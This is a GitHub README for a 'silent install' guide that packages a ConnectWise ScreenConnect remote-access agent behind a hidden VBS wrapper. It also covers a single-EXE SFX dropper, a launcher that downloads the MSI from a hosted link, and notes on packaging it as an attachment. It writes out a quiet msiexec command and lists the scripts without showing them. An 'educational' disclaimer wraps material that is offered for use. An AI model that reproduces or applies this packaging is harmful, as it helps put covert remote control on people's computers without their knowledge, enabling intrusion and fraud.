Skip to content

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commit
 
 
 
 
 
 
 
 

Repository files navigation

Screen Connect Agent Silent Install Guide by iRichNode

Plain-English walkthrough for packaging a ConnectWise ScreenConnect / Control Access agent so a double-click installs it quietly in the background (MSI + hidden wrapper).

Author: iRichNode
Telegram: https://t.me/iRichNodes


What's in this repo

Path Description
Screen_Connect_Agent_Silent_Install_Guide_by_iRichNode.pdf Full step-by-step PDF guide
scripts/setup.vbs Local silent double-click installer wrapper
scripts/download-and-install.vbs Thin launcher that pulls MSI from your download link
scripts/install.bat Batch quiet install helper
scripts/7zsfx-config.txt 7-Zip SFX config for a single EXE drop

Quick start

  1. Log into your ScreenConnect / Control instance.
  2. Build a Windows Access agent MSI (not the interactive EXE).
  3. Save it as agent.msi next to scripts/setup.vbs.
  4. On a lab Windows box (admin), dry-run:
msiexec.exe /i agent.msi ALLUSERS=1 /qn /norestart /L*v "%TEMP%\sc-agent-install.log"
  1. Confirm the ScreenConnect Client service is running and the host shows under Access.
  2. Double-click setup.vbs, or wrap agent.msi + setup.vbs with IExpress / 7-Zip SFX into one EXE.
  3. Optionally host the MSI and point download-and-install.vbs at your URL.

Full detail, troubleshooting, attachment packaging notes, and cleanup steps are in the PDF.


Disclaimer

This guide is for educational purposes only.

It is intended for learning and for people who are legally authorized to test systems they own or have written permission to assess (for example penetration testers under a signed rules of engagement).

iRichNode is not responsible for anyone who uses this material incorrectly, illegally, or outside proper authorization.

If you misuse this guide — including installing remote-access software on systems without permission, deploying agents for harassment, fraud, unauthorized access, or any other unlawful activity — you alone accept the full consequences. That can include civil liability, criminal prosecution, account bans, employer discipline, and any other penalties that apply where you live.

By downloading, copying, or running anything from this repository you confirm that:

  • You will use it only for lawful, authorized, educational, or defensive-security training purposes.
  • You understand that remote-access agent deployment on systems you do not own or control without permission is illegal.
  • You will not hold iRichNode, related channels, or contributors liable for damages, losses, or legal outcomes from your use or misuse.
  • Wrong use is solely your responsibility, and you will face the consequences of that misuse.

If you do not agree, do not use this repository.


Contact

Telegram: https://t.me/iRichNodes


License / use

No warranty of any kind. Provided as-is for education. You are responsible for complying with all applicable laws and vendor terms.

About

Screen Connect Agent Silent Install Guide by iRichNode — educational remote access packaging walkthrough

Resources

Stars

0 stars

Watchers

0 watching

Forks

Releases

Packages

Contributors

Languages